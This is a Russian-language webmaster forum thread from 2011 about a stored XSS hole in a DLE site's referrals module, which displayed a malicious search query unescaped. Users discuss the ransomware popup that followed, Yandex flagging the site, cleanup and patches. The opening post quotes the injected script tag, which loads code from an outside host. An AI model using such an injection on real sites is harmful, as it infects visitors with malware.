Как я словил вирус на комп от своего сайта
Страницы: 1
Как я словил вирус на комп от своего сайта
Открыл я вчера в IE свой сайт, и IE спросил у меня разрешение на запуск скрипта со стороннего сайта. Перерыл в (просмотр html-кода) все скрипты на странице, и нашёл в выводе модуля переходы (у меня dle) такую строку
Код
» <a href="/">g<sc ript src=http://gotraf.net/in.php?id=234></script></a><br />
Как я понял, кто то перешёл на мой сайт по запросу g<sc ript src=http://gotraf.net/in.php?id=234></script>. Пока пытался понять либо сайт пытаются взломать либо вирус внедрить, уже всплыло окно, сообщающее мне, что я должен денег. Что то типа за то, что распостранял порнуху. Нод 32 с последними базами отмолчался в этот момент. Ну вирусняк то стандартный, правда всё равно день на него убил, но напрягает эта уязвимость. И потом, если бот ПС в такой момент на сайт заглянет, ведь сайт в распостранении вирусов обвинят. И чё делать? модуль убирать или может какие его доработки существуют? Вобщем, если кто сталкивался, отпишитесь, буду признателен.
Изменено: daden11 - 12 Июля 2011 17:56

Бесплатная контекстная реклама

У меня тоже такое было, всё почистил. Но вот как избавиться от етой уязвимости?
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).
Изменено: daden11 - 12 Июля 2011 22:37
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html
Блин, накаркал. Яша заметил эту шляпу,
Рисунок

и трафик сразу вниз пошёл (на картинке пользователи онлайн)
Рисунок

в ВМ появилось предупреждение о вирусе с кнопкой перепроверить. Написано,что перепроверка идёт пару дней. Вылезу ли из этого дерьма без потерь или нет, время покажет. Короче, думаю, что всё это происки конкурентов.
Изменено: daden11 - 13 Июля 2011 16:34
Цитата
daden11 пишет:
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).

Нужно через поиск у админ-панели у настройке етого модуля найти переход с етим запросом и удалить его. После етого у меня антивирус перестал выдавать сообщение о заражённом сайте.
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.
Цитата
daden11 пишет:
И чё делать? модуль убирать

Яша за него уже наказывае... smile:)
Цитата
maxim maxim пишет:
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.

я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.
Цитата
Arte пишет:
Яша за него уже наказывае..

я вывод модуля переходы сделал сразу за topnews, и в коде он отображается так же как и topnews. Не думаю, что ПС его определят
Цитата
daden11 пишет:
я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.

Вот за ето спасибо smile:D
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
01:19 Контент из вебархива - яндекс начал индексировать вебархив? 
23:26 Bodyclick.net - рекламная партнерская сеть. 
23:07 19 августа 2017 - текстовый апдейт 
22:53 Пропадает "/" у тегов DLE 
21:03 Если блог охватывает три тематики, можно надеяться на продвижение 
20:03 Сайт не хочет поднимать позиции 
19:41 Adsense личный опыт 
23:00 Продам сообщества Вконтакте 
20:04 Прогон по профилям 300 рублей, 170 сайтов, ТИЦ от 10 
19:52 Продвижение сайтов «прогоны xrumer, статейный» большой выбор тарифов 
17:46 Продвижение в соц. сетях: ВК, Одноклассники, Instagram, Twitter, Facebook, YouTube 
16:08 Идентификация, Готовые Кошельки различных ЭПС 
14:57 NewLine.online - Полуавтоматический обмен электронных валют 
14:02 Предлагаю услуги по поисковому (SEO) продвижению сайтов в ТОП. 
01:15 А зачем нужны прогоны? 
00:56 Интересно есть ли на супре линуксоиды 
22:39 Поиск фотошопера 
14:07 Готовы ли заплатить за эксперимент? 
13:43 Навеянные форумом картинки 
10:40 Андроид игры и приложения 
09:16 Карта скроллинга дала сбой Яндекс.Вебмастер